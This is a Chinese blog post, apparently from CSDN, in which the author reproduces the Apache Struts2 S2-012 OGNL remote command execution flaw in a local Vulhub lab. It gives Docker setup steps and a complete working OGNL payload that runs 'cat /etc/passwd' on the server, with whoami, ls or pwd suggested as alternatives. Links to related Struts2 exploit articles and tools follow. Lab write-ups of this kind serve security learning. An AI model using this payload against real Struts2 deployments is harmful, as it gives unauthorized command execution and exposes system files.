【漏洞复现】Struts2-12远程命令执行

已于 2022-04-25 12:27:34 修改
阅读量3.5k 收藏 3
点赞数
文章标签: 安全
于 2022-04-25 12:26:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44647915/article/details/124337512
版权

此为本人漏洞学习过程。

影响版本: 2.1.0 - 2.3.13

漏洞详情: S2-012 - Apache Struts 2 Wiki - Apache Software Foundation

关于

Status2:

如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如:

<package name="S2-012" extends="struts-default">
    <action name="user" class="com.demo.action.UserAction">
        <result name="redirect" type="redirect">/index.jsp?name=${name}</result>
        <result name="input">/index.jsp</result>
        <result name="success">/index.jsp</result>
    </action>
</package>

这里 UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。

漏洞s2-012

与s2-001相似,可参考001的漏洞复现过程

docker—vulhub—struts2漏洞复现详细过程(s2-001/007/008)_公子YA的博客-CSDN博客_docker struts2

一、环境准备

CentOS7 :

安装Vulhub

参考: Vulhub - Docker-Compose file for vulnerability environment

到下图这步拉取Vulhub即可

此时的虚拟机,克隆失败不要紧,多试几次,一般都是网络问题,ping github.com 能通没啥问题的话就没问题


 

Window10:已安装好BurpSuit

(虚拟机centOS必须要与Win10互ping能通,不然Win10不能访问到该页面,.net模式下互通方法虚拟机配置Nat网络模式和主机互通_J_Unknown的博客-CSDN博客,要是方法不管用,将Win10的网卡重启一下就行)

二、步骤

1.准备工作

 cd vulhub/struts2    切换到struts2

ls    显示当前目录    我们需要的环境是s2-012  cd s2-012     

 ls  能看到s2-012下面有个文档说明

cat   README.zh-cn.md    查看中文说明文档

文档最后的图片也在目录里面可以找到,打开

 文档阅读完毕,可以按照文档提示开始动手

2.按照文档进行测试环境搭建

记得先启动dockers     systemctl start docker

docker-compose build   (可能会报错,再运行一遍就可以了)

docker-compose up -d

 

 查看一下已启动的容器看看是否启动成功-----已成功

3.访问页面

 查看centOS的IP    ifconfig

 

在Win10上访问  192.168.255.134:8080

 启动BurpSuite准备抓包

查看文档,复制粘贴poc到框框内然后点击Submit,开始抓包

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

 结果与文档描述一致

其中插入的执行命令为cat  /etc/passwd

也可换成whoami  或 ls  或者   pwd 

即将  "cat", "/etc/passwd"  换为   "whoami"  或  "ls"  或者  "pwd"

抓包图分别如下

 漏洞复现完毕!

洇玖
关注
(s2-012) Struts2 远程代码执行
weixin_45253622的博客
12-16 2772
影响版本 2.1.0 - 2.3.13 漏洞原理 如果在配置result在action时使用了重定向类型,并且$ {PARAM_NAME}也被用作重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.action.UserAction"> <result name="redirect" type="redirect"&g
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1576
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Struts2远程代码执行
最新发布
2302_79885863的博客
04-29 864
Struts2漏洞是一个经典的漏洞系列,根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效。Struts2执行代码的原理:Struts2的动态性在于ongl表达式可以获取到运行变量的值,并且有机会执行函数调用。
Struts2远程命令执行验证工具
11-22
Struts2漏洞检查工具,可快速检测struts命令执行漏洞,支持批量导入验证,存在可利用的漏洞后,可远程执行命令及文件上传等操作。方便管理人员了解其危害。
struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution
weixin_34309435的博客
07-12 389
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description OGNL provides, among other features, extensive expression evaluatio...
漏洞复现Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 532
描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。攻击者构造恶意字段值(value)通过Struts2struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。......
Struts2远程命令执行漏洞
y@n1n的博客
08-28 1074
web应用框架:是一种开发框架,用来支持动态网站、应用程序、网络服务的开发,其类型有基于请求的和基于组件的,前者代表有struts和spring MVC,后者则有JSF、Taperstry等。 Struts2远程命令执行漏洞 Struts是Apache基金会的一个开源项目,Struts通过采用Java Servlet/JSP技术,实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。 目前,Struts框架广
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1198
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Struts2 S2-057远程代码执行漏洞
weixin_46801402的博客
11-01 900
Struts2 S2-057远程代码执行漏洞
S2-012 远程代码执行漏洞
a1b2c3是弱口令
12-11 1787
原理 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: &lt;package name="S2-012" extends="struts-default"&gt; &lt;action name="user" class="com.demo.action.UserAction"&gt; &amp
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
struts2远程命令执行02
m0_71366428的博客
12-18 4511
Struts2是一个基于Java的开源Web应用程序框架,用于开发Java EE网络应用程序。它建立在Apache Struts框架的基础上,提供了更加灵活、可扩展和安全的开发方式。
漏洞复现Struts2 S2-046 远程命令执行漏洞 (CVE-2017-5638)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 978
CVE-2017-5638 即st2-045/st2-046漏洞,影响范围Struts 2.3.5-2.3.31,Struts 2.5-2.5.10Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。...
Struts2远程命令执行漏洞分析
南方少年的专栏
03-19 704
[size=large]貌似一夜之间struts热乎起来了,各种工具利用代码网络上到处都是。今天livers为大家带来了当前页面实现交互的shell的利用代码分析,感觉非常不错,于是乎转来与大家一起学习下。以下为原文: 大牛们不要见笑。 新的exp 构造的很精巧 以POST的方式提交绕过对输入参数的部分过滤。 ('\43_memberAccess.allowStaticMe...
S2-012 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 3056
前言 漏洞环境改自vulhub的,环境地址 https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-012 漏洞信息 https://cwiki.apache.org/confluence/display/WW/S2-012 当发生重定向时,OGNL表达式会进行二次评估,导致之前在S2-003、S2-005、S2-009进...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
Struts2远程代码执行漏洞
weixin_46801402的博客
11-01 569
Struts2远程代码执行漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值